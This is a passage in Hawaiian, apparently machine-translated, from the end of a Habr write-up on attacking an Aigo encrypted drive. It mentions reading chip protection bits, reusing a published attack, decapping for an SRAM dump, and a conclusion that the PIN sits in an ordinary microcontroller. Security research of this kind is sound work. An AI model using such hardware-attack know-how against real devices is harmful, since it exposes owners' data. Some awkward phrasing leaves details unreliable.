No ka mea heluhelu paha ka SROM i nā bits kiaʻi ma o ke kelepona ʻōnaehana ReadBlock, hiki iā mākou ke hana like me ma ka blog a Dmitry Nedospasov - kahi hoʻokō hou o ka hoʻouka kaua ʻana o Chris Gerlinski, i hoʻolaha ʻia ma ka ʻaha kūkā. .
ʻO kekahi mea leʻaleʻa e hiki ke hana ʻia ʻo ka ʻoki ʻana i ka hihia mai ka chip: e lawe i kahi SRAM dump, e ʻike i nā kelepona ʻole a me nā nāwaliwali.
9. Panina
No laila, ʻo ka pale o kēia kaʻa e waiho nui i ka makemake, no ka mea, hoʻohana ia i kahi microcontroller maʻamau (ʻaʻole "paʻakikī") e mālama i ka code PIN ... Eia kekahi, ʻaʻole wau i nānā (akā) i ke ʻano o nā mea me ka ʻikepili. hoʻopunipuni ma kēia mea hana!
He aha kāu e paipai ai no Aigo? Ma hope o ka nānā ʻana i kekahi mau hiʻohiʻona o nā drive HDD i hoʻopili ʻia, ma 2015 ua hana wau ma SyScan, kahi i nānā ai ʻo ia i nā pilikia palekana o kekahi mau drive HDD waho, a hana i nā ʻōlelo aʻoaʻo i nā mea e hiki ke hoʻomaikaʻi ʻia i loko o lākou. 🙂
Ua hoʻohana au i ʻelua pule pule a me kekahi mau ahiahi e hana ana i kēia noiʻi. He 40 mau hola ka nui. Ka helu ʻana mai ka hoʻomaka ʻana (i ka wā i wehe ai au i ka disk) a hiki i ka hopena (PIN code dump). ʻO nā hola 40 like me ka manawa aʻu i kākau ai i kēia ʻatikala. He huakaʻi hoihoi loa ia.
Source: www.habr.com